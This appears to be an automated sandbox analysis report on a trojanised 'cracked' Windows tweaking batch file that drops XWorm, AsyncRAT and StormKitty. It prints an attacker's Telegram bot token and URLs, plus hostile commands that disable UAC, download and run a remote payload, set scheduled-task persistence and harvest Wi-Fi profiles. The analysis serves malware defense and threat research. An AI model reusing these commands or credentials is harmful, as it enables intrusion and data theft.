Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29-12-2024 11:23

General

  • Target

    EXM_Premium_Tweaking_Utility_1.0_Cracked.bat

  • Size

    672KB

  • MD5

    62effd806c73fab27bdae3a51dd955d8

  • SHA1

    8ce251bd3d0a31fca442884a3fe0ebe940d08ca0

  • SHA256

    63577b4677fe321246f2b6991639c920b55d4991b8fcf5986787ea1cd55e3250

  • SHA512

    19e954a8bdae76848188b2b12675bce8d56df30e6ffaa9e7b07b888631419e23c2f40e176ed8ea7f7b6b0a7ae7521ca06ed6dc4cb53663bf9b7fdc888dc7aaaa

  • SSDEEP

    3072:FWGzQbmbkAqA2xH7VkKEn14IZVvisLur+K3:FWGiVNEn14IZVvisL43

Malware Config

Extracted

Family

xworm

Attributes
  • Install_directory

    %LocalAppData%

  • install_file

    USB.exe

  • pastebin_url

    https://pastebin.com/raw/ZnhxAV6a

  • telegram

    https://api.telegram.org/bot7538644364:AAHEMV7mmxz6PSRgzo0ORf3_n0BaazmrAqk/sendMessage?chat_id=7541917888

Extracted

Family

asyncrat

Botnet

Default

C2

127.0.0.1:6606

127.0.0.1:7707

127.0.0.1:8808

https://api.telegram.org/bot7538644364:AAHEMV7mmxz6PSRgzo0ORf3_n0BaazmrAqk/sendMessage?chat_id=7541917888

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • Detect Xworm Payload 2 IoCs
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 2 IoCs
  • Stormkitty family
  • UAC bypass 3 TTPs 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Async RAT payload 1 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 5 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Drops desktop.ini file(s) 7 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Detects Pyinstaller 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 61 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\EXM_Premium_Tweaking_Utility_1.0_Cracked.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3652
    • C:\Windows\system32\reg.exe
      Reg.exe delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\SystemRestore" /v "RPSessionInterval" /f
      2⤵
        PID:2444
      • C:\Windows\system32\reg.exe
        Reg.exe delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\SystemRestore" /v "DisableConfig" /f
        2⤵
          PID:1388
        • C:\Windows\system32\reg.exe
          Reg.exe add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "SystemRestorePointCreationFrequency" /t REG_DWORD /d 0 /f
          2⤵
            PID:4516
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -ExecutionPolicy Unrestricted -NoProfile Enable-ComputerRestore -Drive 'C:\'
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2252
          • C:\Windows\system32\reg.exe
            Reg.exe ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d "0" /f
            2⤵
            • UAC bypass
            PID:2148
          • C:\Windows\system32\reg.exe
            Reg.exe add "HKCU\CONSOLE" /v "VirtualTerminalLevel" /t REG_DWORD /d "1" /f
            2⤵
              PID:4648
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c wmic path Win32_UserAccount where name="Admin" get sid | findstr "S-"
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:964
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic path Win32_UserAccount where name="Admin" get sid
                3⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:4776
              • C:\Windows\system32\findstr.exe
                findstr "S-"
                3⤵
                  PID:2912
              • C:\Windows\system32\chcp.com
                chcp 65001
                2⤵
                  PID:2104
                • C:\Windows\system32\chcp.com
                  chcp 437
                  2⤵
                    PID:3044
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell -ExecutionPolicy Bypass -Command "Checkpoint-Computer -Description 'Exm Premium Restore Point' -RestorePointType 'MODIFY_SETTINGS'"
                    2⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2124
                  • C:\Windows\system32\chcp.com
                    chcp 65001
                    2⤵
                      PID:3092
                    • C:\Windows\system32\chcp.com
                      chcp 437
                      2⤵
                        PID:4048
                      • C:\Windows\system32\curl.exe
                        curl -g -k -L -# -o "C:\Users\Admin\AppData\Local\Temp\exm.zip" "https://github.com/anonyketa/EXM-Tweaking-Utility-Premium/releases/download/V1.0/exm.zip"
                        2⤵
                          PID:3924
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell -NoProfile Expand-Archive 'C:\Users\Admin\AppData\Local\Temp\exm.zip' -DestinationPath 'C:\Exm\'
                          2⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3180
                        • C:\exm\EXMservice.exe
                          EXMservice.exe
                          2⤵
                          • Checks computer location settings
                          • Executes dropped EXE
                          • Suspicious use of WriteProcessMemory
                          PID:2148
                          • C:\Users\Admin\msedge.exe
                            "C:\Users\Admin\msedge.exe"
                            3⤵
                            • Checks computer location settings
                            • Drops startup file
                            • Executes dropped EXE
                            • Suspicious behavior: AddClipboardFormatListener
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of SetWindowsHookEx
                            • Suspicious use of WriteProcessMemory
                            PID:2096
                            • C:\Windows\System32\schtasks.exe
                              "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\Admin\AppData\Local\msedge.exe"
                              4⤵
                              • Scheduled Task/Job: Scheduled Task
                              PID:2092
                          • C:\Users\Admin\svchost.exe
                            "C:\Users\Admin\svchost.exe"
                            3⤵
                            • Executes dropped EXE
                            • Drops desktop.ini file(s)
                            • System Location Discovery: System Language Discovery
                            • Checks processor information in registry
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:2552
                            • C:\Windows\SysWOW64\cmd.exe
                              "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                              4⤵
                              • System Location Discovery: System Language Discovery
                              • System Network Configuration Discovery: Wi-Fi Discovery
                              • Suspicious use of WriteProcessMemory
                              PID:3208
                              • C:\Windows\SysWOW64\chcp.com
                                chcp 65001
                                5⤵
                                • System Location Discovery: System Language Discovery
                                PID:4820
                              • C:\Windows\SysWOW64\netsh.exe
                                netsh wlan show profile
                                5⤵
                                • Event Triggered Execution: Netsh Helper DLL
                                • System Location Discovery: System Language Discovery
                                • System Network Configuration Discovery: Wi-Fi Discovery
                                PID:4252
                              • C:\Windows\SysWOW64\findstr.exe
                                findstr All
                                5⤵
                                • System Location Discovery: System Language Discovery
                                PID:2936
                            • C:\Windows\SysWOW64\cmd.exe
                              "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                              4⤵
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of WriteProcessMemory
                              PID:3576
                              • C:\Windows\SysWOW64\chcp.com
                                chcp 65001
                                5⤵
                                • System Location Discovery: System Language Discovery
                                PID:3860
                              • C:\Windows\SysWOW64\netsh.exe
                                netsh wlan show networks mode=bssid
                                5⤵
                                • Event Triggered Execution: Netsh Helper DLL
                                • System Location Discovery: System Language Discovery
                                PID:4444
                        • C:\Windows\system32\chcp.com
                          chcp 65001
                          2⤵
                            PID:3152
                          • C:\Windows\system32\reg.exe
                            Reg.exe add "HKCU\Control Panel\Desktop" /v "AutoEndTasks" /t REG_SZ /d "1" /f
                            2⤵
                              PID:2272
                            • C:\Windows\system32\reg.exe
                              Reg.exe add "HKCU\Control Panel\Desktop" /v "HungAppTimeout" /t REG_SZ /d "1000" /f
                              2⤵
                                PID:4876
                              • C:\Windows\system32\reg.exe
                                Reg.exe add "HKCU\Control Panel\Desktop" /v "WaitToKillAppTimeout" /t REG_SZ /d "2000" /f
                                2⤵
                                  PID:1528
                                • C:\Windows\system32\reg.exe
                                  Reg.exe add "HKCU\Control Panel\Desktop" /v "LowLevelHooksTimeout" /t REG_SZ /d "1000" /f
                                  2⤵
                                    PID:1976
                                  • C:\Windows\system32\reg.exe
                                    Reg.exe add "HKCU\Control Panel\Desktop" /v "MenuShowDelay" /t REG_SZ /d "0" /f
                                    2⤵
                                      PID:2284
                                    • C:\Windows\system32\reg.exe
                                      Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control" /v "WaitToKillServiceTimeout" /t REG_SZ /d "2000" /f
                                      2⤵
                                        PID:4192
                                      • C:\Windows\system32\reg.exe
                                        Reg.exe add "HKLM\SOFTWARE\Microsoft\FTH" /v "Enabled" /t REG_DWORD /d "0" /f
                                        2⤵
                                          PID:2816
                                        • C:\Windows\system32\reg.exe
                                          Reg.exe delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\MicrosoftEdgeUpdateTaskMachineCore" /f
                                          2⤵
                                            PID:3796
                                          • C:\Windows\system32\reg.exe
                                            Reg.exe delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\MicrosoftEdgeUpdateTaskMachineUA" /f
                                            2⤵
                                              PID:1632
                                            • C:\Windows\system32\reg.exe
                                              Reg.exe add "HKLM\SOFTWARE\Policies\Google\Chrome" /v "StartupBoostEnabled" /t REG_DWORD /d "0" /f
                                              2⤵
                                                PID:2288
                                              • C:\Windows\system32\reg.exe
                                                Reg.exe add "HKLM\SOFTWARE\Policies\Google\Chrome" /v "BackgroundModeEnabled" /t REG_DWORD /d "0" /f
                                                2⤵
                                                  PID:4024
                                                • C:\Windows\system32\reg.exe
                                                  Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\DWM" /v "UseDpiScaling" /t REG_DWORD /d "0" /f
                                                  2⤵
                                                    PID:1388
                                                  • C:\Windows\system32\reg.exe
                                                    Reg.exe add "HKCU\Software\Microsoft\Multimedia\Audio" /v "UserDuckingPreference" /t REG_DWORD /d "3" /f
                                                    2⤵
                                                      PID:3396
                                                    • C:\Windows\system32\reg.exe
                                                      Reg.exe add "HKLM\Software\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\BootAnimation" /v "DisableStartupSound" /t REG_DWORD /d "1" /f
                                                      2⤵
                                                        PID:2728
                                                      • C:\Windows\system32\reg.exe
                                                        Reg.exe add "HKCU\Control Panel\Mouse" /v "MouseSpeed" /t REG_SZ /d "0" /f
                                                        2⤵
                                                          PID:2172
                                                        • C:\Windows\system32\reg.exe
                                                          Reg.exe add "HKCU\Control Panel\Mouse" /v "MouseThreshold1" /t REG_SZ /d "0" /f
                                                          2⤵
                                                            PID:992
                                                          • C:\Windows\system32\reg.exe
                                                            Reg.exe add "HKCU\Control Panel\Mouse" /v "MouseThreshold2" /t REG_SZ /d "0" /f
                                                            2⤵
                                                              PID:3364
                                                            • C:\Windows\system32\reg.exe
                                                              Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ctfmon" /t REG_SZ /d "C:\Windows\System32\ctfmon.exe" /f
                                                              2⤵
                                                              • Adds Run key to start application
                                                              PID:440
                                                            • C:\Windows\system32\reg.exe
                                                              Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\VideoSettings" /v "VideoQualityOnBattery" /t REG_DWORD /d "1" /f
                                                              2⤵
                                                                PID:3492
                                                              • C:\Windows\system32\reg.exe
                                                                Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "IconsOnly" /t REG_DWORD /d "0" /f
                                                                2⤵
                                                                  PID:4640
                                                                • C:\Windows\system32\reg.exe
                                                                  Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "ListviewShadow" /t REG_DWORD /d "0" /f
                                                                  2⤵
                                                                    PID:4736
                                                                  • C:\Windows\system32\reg.exe
                                                                    Reg.exe add "HKLM\Software\Policies\Microsoft\Windows\DataCollection" /v "AllowTelemetry" /t REG_DWORD /d "0" /f
                                                                    2⤵
                                                                      PID:2504
                                                                    • C:\Windows\system32\reg.exe
                                                                      Reg.exe add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\DataCollection" /v "AllowTelemetry" /t REG_DWORD /d "0" /f
                                                                      2⤵
                                                                        PID:3328
                                                                      • C:\Windows\system32\reg.exe
                                                                        Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\DataCollection" /v "AllowDeviceNameInTelemetry" /t REG_DWORD /d "0" /f
                                                                        2⤵
                                                                          PID:2164
                                                                        • C:\Windows\system32\reg.exe
                                                                          Reg.exe add "HKLM\Software\Policies\Microsoft\Windows\safer\codeidentifiers" /v "authenticodeenabled" /t REG_DWORD /d "0" /f
                                                                          2⤵
                                                                            PID:3884
                                                                          • C:\Windows\system32\reg.exe
                                                                            Reg.exe add "HKLM\Software\Policies\Microsoft\Windows\Windows Error Reporting" /v "DontSendAdditionalData" /t REG_DWORD /d "1" /f
                                                                            2⤵
                                                                              PID:1556
                                                                            • C:\Windows\system32\reg.exe
                                                                              Reg.exe add "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Policies\DataCollection" /v "AllowTelemetry" /t REG_DWORD /d "0" /f
                                                                              2⤵
                                                                                PID:3044
                                                                              • C:\Windows\system32\reg.exe
                                                                                Reg.exe add "HKCU\SOFTWARE\Microsoft\Speech_OneCore\Settings\OnlineSpeechPrivacy" /v "HasAccepted" /t REG_DWORD /d "0" /f
                                                                                2⤵
                                                                                  PID:4184
                                                                                • C:\Windows\system32\reg.exe
                                                                                  Reg.exe add "HKCU\SOFTWARE\Microsoft\Personalization\Settings" /v "AcceptedPrivacyPolicy" /t REG_DWORD /d "0" /f
                                                                                  2⤵
                                                                                    PID:3000
                                                                                  • C:\Windows\system32\reg.exe
                                                                                    Reg.exe add "HKCU\SOFTWARE\Microsoft\InputPersonalization" /v "RestrictImplicitInkCollection" /t REG_DWORD /d "1" /f
                                                                                    2⤵
                                                                                      PID:2868
                                                                                    • C:\Windows\system32\reg.exe
                                                                                      Reg.exe add "HKCU\SOFTWARE\Microsoft\InputPersonalization" /v "RestrictImplicitTextCollection" /t REG_DWORD /d "1" /f
                                                                                      2⤵
                                                                                        PID:4940
                                                                                      • C:\Windows\system32\reg.exe
                                                                                        Reg.exe add "HKCU\SOFTWARE\Microsoft\InputPersonalization\TrainedDataStore" /v "HarvestContacts" /t REG_DWORD /d "0" /f
                                                                                        2⤵
                                                                                          PID:2620
                                                                                        • C:\Windows\system32\reg.exe
                                                                                          Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\DataCollection" /v "AllowTelemetry" /t REG_DWORD /d "0" /f
                                                                                          2⤵
                                                                                            PID:3164
                                                                                          • C:\Windows\system32\reg.exe
                                                                                            Reg.exe add "HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Settings" /v "DownloadMode" /t REG_DWORD /d "0" /f
                                                                                            2⤵
                                                                                            • Modifies data under HKEY_USERS
                                                                                            PID:4720
                                                                                          • C:\Windows\system32\reg.exe
                                                                                            Reg.exe add "HKCU\Control Panel\International\User Profile" /v "HttpAcceptLanguageOptOut" /t REG_DWORD /d "1" /f
                                                                                            2⤵
                                                                                              PID:1156
                                                                                            • C:\Windows\system32\reg.exe
                                                                                              Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\DriverSearching" /v "SearchOrderConfig" /t REG_DWORD /d "0" /f
                                                                                              2⤵
                                                                                                PID:3496
                                                                                              • C:\Windows\system32\reg.exe
                                                                                                Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Device Metadata" /v "PreventDeviceMetadataFromNetwork" /t REG_DWORD /d "1" /f
                                                                                                2⤵
                                                                                                  PID:2936
                                                                                                • C:\Windows\system32\reg.exe
                                                                                                  Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "NoAutoUpdate" /t REG_DWORD /d "1" /f
                                                                                                  2⤵
                                                                                                    PID:3588
                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                    Reg.exe add "HKCU\Software\Microsoft\Windows\DWM" /v "EnableAeroPeek" /t REG_DWORD /d "0" /f
                                                                                                    2⤵
                                                                                                      PID:4424
                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                      Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\location" /v "Value" /t REG_SZ /d "Deny" /f
                                                                                                      2⤵
                                                                                                        PID:4432
                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\appDiagnostics" /v "Value" /t REG_SZ /d "Deny" /f
                                                                                                        2⤵
                                                                                                          PID:3636
                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                          Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\userAccountInformation" /v "Value" /t REG_SZ /d "Deny" /f
                                                                                                          2⤵
                                                                                                            PID:1648
                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                            Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v "SilentInstalledAppsEnabled" /t REG_DWORD /d "0" /f
                                                                                                            2⤵
                                                                                                              PID:2480
                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                              Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v "SystemPaneSuggestionsEnabled" /t REG_DWORD /d "0" /f
                                                                                                              2⤵
                                                                                                                PID:4920
                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v "SoftLandingEnabled" /t REG_DWORD /d "0" /f
                                                                                                                2⤵
                                                                                                                  PID:3668
                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                  Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v "RotatingLockScreenEnabled" /t REG_DWORD /d "0" /f
                                                                                                                  2⤵
                                                                                                                    PID:708
                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                    Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "PublishUserActivities" /t REG_DWORD /d "0" /f
                                                                                                                    2⤵
                                                                                                                      PID:1892
                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                      Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "UploadUserActivities" /t REG_DWORD /d "0" /f
                                                                                                                      2⤵
                                                                                                                        PID:4444
                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                        Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\BackgroundAccessApplications" /v "GlobalUserDisabled" /t REG_DWORD /d "1" /f
                                                                                                                        2⤵
                                                                                                                          PID:388
                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                          Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Search" /v "BackgroundAppGlobalToggle" /t REG_DWORD /d "0" /f
                                                                                                                          2⤵
                                                                                                                            PID:2004
                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                            Reg.exe add "HKLM\Software\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config" /v "DownloadMode" /t REG_DWORD /d "0" /f
                                                                                                                            2⤵
                                                                                                                              PID:4664
                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                              Reg.exe add "HKLM\Software\Policies\Microsoft\Windows\DataCollection" /v "DoNotShowFeedbackNotifications" /t REG_DWORD /d "1" /f
                                                                                                                              2⤵
                                                                                                                                PID:2196
                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                Reg.exe add "HKCU\SOFTWARE\Microsoft\Siuf\Rules" /v "NumberOfSIUFInPeriod" /t REG_DWORD /d "0" /f
                                                                                                                                2⤵
                                                                                                                                  PID:4376
                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                  Reg.exe add "HKCU\SOFTWARE\Microsoft\Siuf\Rules" /v "PeriodInNanoSeconds" /t REG_DWORD /d "0" /f
                                                                                                                                  2⤵
                                                                                                                                    PID:4568
                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                    Reg.exe add "HKCU\Software\Policies\Microsoft\Assistance\Client\1.0" /v "NoExplicitFeedback" /t REG_DWORD /d "1" /f
                                                                                                                                    2⤵
                                                                                                                                      PID:5028
                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                      Reg.exe add "HKCU\SOFTWARE\Microsoft\Assistance\Client\1.0\Settings" /v "ImplicitFeedback" /t REG_DWORD /d "0" /f
                                                                                                                                      2⤵
                                                                                                                                        PID:2980
                                                                                                                                    • C:\Windows\system32\vssvc.exe
                                                                                                                                      C:\Windows\system32\vssvc.exe
                                                                                                                                      1⤵
                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:3584
                                                                                                                                    • C:\Windows\system32\srtasks.exe
                                                                                                                                      C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
                                                                                                                                      1⤵
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:1040
                                                                                                                                    • C:\Users\Admin\AppData\Local\msedge.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\msedge.exe
                                                                                                                                      1⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:2196
                                                                                                                                    • C:\Users\Admin\AppData\Local\msedge.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\msedge.exe
                                                                                                                                      1⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:2164

                                                                                                                                    Network

                                                                                                                                    MITRE ATT&CK Enterprise v15

                                                                                                                                    Replay Monitor

                                                                                                                                    Loading Replay Monitor...

                                                                                                                                    Downloads

                                                                                                                                    • C:\Users\Admin\AppData\Local\1d9db3c2a73d8bdac24747a947fd4f64\Admin@GYHASOLS_en-US\Browsers\Firefox\Bookmarks.txt

                                                                                                                                      Filesize

                                                                                                                                      105B

                                                                                                                                      MD5

                                                                                                                                      2e9d094dda5cdc3ce6519f75943a4ff4

                                                                                                                                      SHA1

                                                                                                                                      5d989b4ac8b699781681fe75ed9ef98191a5096c

                                                                                                                                      SHA256

                                                                                                                                      c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142

                                                                                                                                      SHA512

                                                                                                                                      d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7

                                                                                                                                    • C:\Users\Admin\AppData\Local\1d9db3c2a73d8bdac24747a947fd4f64\Admin@GYHASOLS_en-US\System\Process.txt

                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                      MD5

                                                                                                                                      a09024be704b94fb06c124a6cf7581ba

                                                                                                                                      SHA1

                                                                                                                                      0e549fa3c80b32f461c6f529a2cbbb38bc868640

                                                                                                                                      SHA256

                                                                                                                                      b3df8a0db03490900b1d895b8f45d450d53bd973a7bb0a79783d86809cdccc57

                                                                                                                                      SHA512

                                                                                                                                      9b8bf8a22ab902095ee1a806084221b270bc2889e62b89b9ea350c44fb15df257d9b163ebd7dc98c9fc27755ae2cf812fd390079c2c094f6eb04bcb3aad4c5e3

                                                                                                                                    • C:\Users\Admin\AppData\Local\1d9db3c2a73d8bdac24747a947fd4f64\msgid.dat

                                                                                                                                      Filesize

                                                                                                                                      1B

                                                                                                                                      MD5

                                                                                                                                      cfcd208495d565ef66e7dff9f98764da

                                                                                                                                      SHA1

                                                                                                                                      b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

                                                                                                                                      SHA256

                                                                                                                                      5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

                                                                                                                                      SHA512

                                                                                                                                      31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\msedge.exe.log

                                                                                                                                      Filesize

                                                                                                                                      654B

                                                                                                                                      MD5

                                                                                                                                      2ff39f6c7249774be85fd60a8f9a245e

                                                                                                                                      SHA1

                                                                                                                                      684ff36b31aedc1e587c8496c02722c6698c1c4e

                                                                                                                                      SHA256

                                                                                                                                      e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

                                                                                                                                      SHA512

                                                                                                                                      1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                      Filesize

                                                                                                                                      2KB

                                                                                                                                      MD5

                                                                                                                                      6cf293cb4d80be23433eecf74ddb5503

                                                                                                                                      SHA1

                                                                                                                                      24fe4752df102c2ef492954d6b046cb5512ad408

                                                                                                                                      SHA256

                                                                                                                                      b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

                                                                                                                                      SHA512

                                                                                                                                      0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                      Filesize

                                                                                                                                      64B

                                                                                                                                      MD5

                                                                                                                                      5caad758326454b5788ec35315c4c304

                                                                                                                                      SHA1

                                                                                                                                      3aef8dba8042662a7fcf97e51047dc636b4d4724

                                                                                                                                      SHA256

                                                                                                                                      83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

                                                                                                                                      SHA512

                                                                                                                                      4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                      Filesize

                                                                                                                                      64B

                                                                                                                                      MD5

                                                                                                                                      446dd1cf97eaba21cf14d03aebc79f27

                                                                                                                                      SHA1

                                                                                                                                      36e4cc7367e0c7b40f4a8ace272941ea46373799

                                                                                                                                      SHA256

